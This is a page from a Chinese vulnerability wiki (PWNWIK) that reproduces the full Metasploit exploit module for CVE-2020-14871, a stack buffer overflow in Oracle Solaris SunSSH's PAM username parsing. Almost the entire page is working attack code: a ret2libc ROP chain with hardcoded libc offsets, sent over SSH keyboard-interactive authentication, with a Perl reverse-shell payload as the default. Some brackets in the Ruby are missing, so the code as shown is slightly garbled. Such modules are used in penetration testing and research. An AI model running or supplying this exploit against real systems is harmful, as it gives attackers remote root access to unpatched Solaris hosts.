Loading
0

CVE-2020-14871 Oracle Solaris SunSSH PAM parse user name() 缓冲区溢出漏洞

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

EXP

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
 
  Rank = NormalRanking
 
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::CheckModule
  include Msf::Exploit::Remote::SSH
 
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow in the Solaris PAM
          library's username parsing code, as used by the SunSSH daemon when the
          keyboard-interactive authentication method is specified.
 
          Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox,
          VMware Fusion, and VMware Player. Bare metal untested. Your addresses
          may vary.
        },
        'Author' => 
          'Jacob Thompson', # Analysis
          'Aaron Carreras', # Analysis
          'Jeffrey Martin', # Testing
          'Hacker Fantastic', # PoC
          'wvu' # Exploit
        ,
        'References' => 
          'CVE', '2020-14871',
          'URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html',
          'URL', 'https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover.html',
          'URL', 'https://hacker.house/lab/cve-2020-18471/',
          'URL', 'https://twitter.com/hackerfantastic/status/1323431512822435841'
        ,
        'DisclosureDate' => '2020-10-20', # Vendor advisory
        'License' => MSF_LICENSE,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Privileged' => true,
        'Payload' => {
          # https://github.com/illumos/illumos-gate/blob/edd669a7ce20a2f7406e8f00489c426c0690f1bd/usr/src/lib/libpam/pam_framework.c#L615-L617
          'BadChars' => "\x00\x09\x20",
          'Encoder' => 'cmd/perl'
        },
        'Targets' => 
          
            'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware',
            {
              'Ident' => 'SSH-2.0-Sun_SSH_1.1.5',
              'LibcBase' => 0xfeb90000
            }
          ,
          
            'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox',
            {
              'Ident' => 'SSH-2.0-Sun_SSH_1.1.5',
              'LibcBase' => 0xfeb80000
            }
          
        ,
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_perl',
          'SSH_TIMEOUT' => 2,
          'CheckModule' => 'auxiliary/scanner/ssh/ssh_version'
        },
        'Notes' => {
          'Stability' => CRASH_SERVICE_RESTARTS,
          'Reliability' => REPEATABLE_SESSION,
          'SideEffects' => ACCOUNT_LOCKOUTS, IOC_IN_LOGS
        }
      )
    )
  end
 
  def check
    # Run auxiliary/scanner/ssh/ssh_version
    checkcode = super
 
    return checkcode unless checkcode == CheckCode::Detected
 
    unless target'Ident' == checkcode.details:ident
      return CheckCode::Safe("#{target.name} is an incompatible target.")
    end
 
    CheckCode::Appears("#{target.name} is a compatible target.")
  end
 
  def exploit
    print_status("Exploiting #{target.name}")
 
    ssh_client_opts = ssh_client_defaults.merge(
      port: rport,
      auth_methods: 'keyboard-interactive',
      password: ret2libc, # HACK: This is really the username prompt on Solaris
      timeout: datastore'SSH_TIMEOUT'
    )
 
    ssh_client_opts.merge!(verbose: :debug) if datastore'SSH_DEBUG'
 
    print_status("Yeeting #{datastore'PAYLOAD'} at #{peer}")
 
    # Empty initial username
    Net::SSH.start(rhost, '', ssh_client_opts)
  rescue Net::SSH::AuthenticationFailed
    print_error(CheckCode::Safe.message)
  rescue Net::SSH::Disconnect
    print_warning('Disconnected, target selection may be incorrect!')
  rescue Net::SSH::ConnectionTimeout
    # Do nothing on success
  end
 
  # XXX: No ASLR, but libc base changes...
  def ret2libc
    buf = rand_text(516)
    buf << p32(target'LibcBase' + 0x23904) # add esp, 8; ret
    buf << rand_text(4)
    buf << p32(0x08040101) # ecx
    buf << p32(0x0805ba07) # pop ecx; pop edx; pop ebp; ret
    buf << p32(target'LibcBase' + 0x256d0) # exit(3)
    buf << p32(target'LibcBase' + 0x91edf) # system(3)
    buf << rand_text(4)
    buf << p32(target'LibcBase' + 0xae3f1) # push esp; and al, 0; push ecx; push edx; ret
    buf << payload.encoded
  end
 
  def p32(addr)
    addr.pack('V')
  end
 
end

免费、自由、人人可编辑的漏洞库